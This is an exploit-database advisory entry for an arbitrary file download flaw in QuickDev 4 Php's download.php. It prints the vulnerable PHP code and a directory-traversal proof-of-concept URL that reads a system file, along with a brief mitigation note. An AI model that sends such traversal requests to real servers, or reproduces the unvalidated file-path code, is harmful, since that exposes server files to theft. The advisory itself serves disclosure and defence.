QuickDev 4 Php (download.php file) Arbitrary File Download

vendor:

QuickDev 4 Php

by:

SirGod

7,5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: QuickDev 4 Php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

QuickDev 4 Php (download.php file) Arbitrary File Download

The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'download.php' script. This can be exploited to download arbitrary files from the web server via a specially crafted HTTP request.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################

[+] Download : http://sourceforge.net/projects/quickdev4php/files/

[+] Arbitrary File Download

 - Vulnerable code in download.php

--------------------------------------------------------------------------

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();

--------------------------------------------------------------------------

 - PoC

   http://127.0.0.1/download.php?file=../../../../../../boot.ini

#####################################################################################

# milw0rm.com [2009-08-03]